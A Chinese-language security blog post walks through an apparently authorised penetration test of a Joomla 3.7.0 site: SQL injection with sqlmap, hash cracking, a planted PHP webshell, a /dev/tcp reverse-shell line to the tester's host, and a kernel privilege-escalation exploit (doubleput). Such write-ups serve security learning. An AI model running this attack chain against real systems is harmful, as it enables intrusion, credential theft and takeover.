最近在一次對某外企進行滲透測試的過程中(已授權)成功突破內網,發現了一個Joomla CMS,想著把這個滲透過程和思路寫下來,供大家參考,請大佬略過。。。
首先,對其進行掃描
發現其版本為 Joomla 3.7.0
於是,搜索這個版本的漏洞,,,
發現存在SQL注入漏洞,繼續查看詳情
上sqlmap跑一波,成功爆庫。。。
接下來,爆表
爆用戶名密碼
在線跑了一下MD5,實在是跑不出來,接下來試試John破解
成功破解,得到密碼,登錄後臺,進入模板寫入一句話,訪問:
http://10.1.1.104/templates/protostar/shell.php
沒有問題,菜刀連接
查看權限,發現不是root
接下來進行提權,首先我們查看系統版本,發現是Linux 4.4.0,查找一個這個版本的漏洞試了好幾個都不行,發現這個可以
好,我們上傳exp
提權、、、、菜刀不好用,寫一個反彈PHP文件,反彈回來一個shell
<code>& /dev/tcp/10.1.1.103/7777 0>&1'");?>/<code>
本地監聽7777 然後訪問:
http://10.1.1.104/templates/protostar/cmd.php
成功反彈shell
接著繼續提權、、、運行如下兩個文件
<code>./compile.sh./doubleput/<code>
OK,提權成功。。。
閱讀更多 KillBoy安全實驗室 的文章